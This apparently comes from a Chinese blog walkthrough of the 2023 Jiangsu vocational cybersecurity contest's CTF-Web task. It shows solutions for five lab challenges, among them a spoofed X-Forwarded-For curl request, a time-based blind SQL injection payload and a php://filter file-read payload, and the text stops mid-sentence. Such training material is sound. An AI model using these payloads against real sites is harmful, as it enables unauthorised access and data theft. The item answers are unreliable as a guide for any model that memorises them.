2023年江苏省职业院校技能大赛中职网络安全赛项试卷第二阶段任务书

任务一:CTF-Web(80分)

任务环境说明:

√ 服务器场景: System0116

√ 服务器场景操作系统:未知

√ 服务器场景用户名:未知 密码:未知

1.访问http://靶机IP/web1/,获取flag值,Flag格式为flag{xxx};(10分)

查看源码flag就在源码里面

在浏览器中打开目标网站,查看网页源代码,可以找到Flag。

2.访问http://靶机IP/web2/,获取flag值,Flag格式为flag{xxx};(10分)

使用bp看返回数据查看响应

在浏览器中打开目标网站,使用浏览器的开发者工具(如Chrome的开发者工具)打开“Network”标签页,输入用户名和密码后,查看响应,可以找到Flag。

3.访问http://靶机IP/web3/,获取flag值,Flag格式为flag{xxx};(20分)

伪造地址127.0.0.1

x-forwarded-for:127.0.0.1

在HTTP请求头中添加“X-Forwarded-For”字段,将其设置为“127.0.0.1”,模拟请求来自本地。例如,使用curl命令发送HTTP请求:

curl -H "X-Forwarded-For: 127.0.0.1" http://靶机IP/web3/

4.访问http://靶机IP/web4/,获取flag值,Flag格式为flag{xxx};(10分)

时间盲注 添加sleep函数 and sleep(5)

通过时间盲注攻击获取Flag,可以在输入框中输入以下内容,使用sleep函数并增加延迟时间,例如5秒:

' and if (sleep(5), 1, 1) and '

5.访问http://靶机IP/web5/,获取flag值,Flag格式为flag{xxx};(10分)

构造php伪协议

?file=php://filter/read=convert.base64-encode/resource=./fileprotocol.php

通过构造php伪协议,可以读取目标服务器上的PHP源代码,将其转换为base64编码,并在本地解码,获取Flag。例如,使用以下URL访问:

http://靶机IP/web5/?file=php://filter/read=convert.base64-encode/resource=./fileprotocol.php

其中,file参数指定要读取的文件路径,使用php://伪协议来指定读取PHP源代码,然后使用f

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明裕学长

打赏私我进交流群

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值